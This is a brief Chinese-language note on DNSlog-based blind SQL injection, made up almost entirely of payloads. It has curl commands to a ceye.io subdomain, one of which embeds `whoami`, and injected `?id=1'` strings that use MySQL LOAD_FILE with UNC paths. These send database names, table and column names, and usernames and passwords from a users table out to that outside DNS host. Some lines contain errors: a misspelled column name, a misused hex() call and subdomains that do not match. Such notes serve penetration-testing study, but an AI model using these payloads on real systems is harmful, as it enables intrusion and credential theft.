1.3.3-SQL注入-SQL盲注-Dnslog盲注

http://ceye.io/profile
curl mzq83x.ceye.io

curl `whoami`.mzq83x.ceye.io

核心语法： SELECT LOAD_FILE(CONCAT('\\\\',(select database()),'.mysql.r5ourp.ceye.io\\abc'));
sql语句不能含有特殊符号

查表
?id=1' and LOAD_FILE(CONCAT('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.mysql.r5oup.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select colum_name from information_schema.columns where table_name='users' limit 5,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat(username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select concat_ws('A',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+

?id=1' and LOAD_FILE(CONCAT('\\\\',(select hex('~',username,password) from security.users limit 0,1),'.mysql.r5ourp.ceye.io\\abc'))--+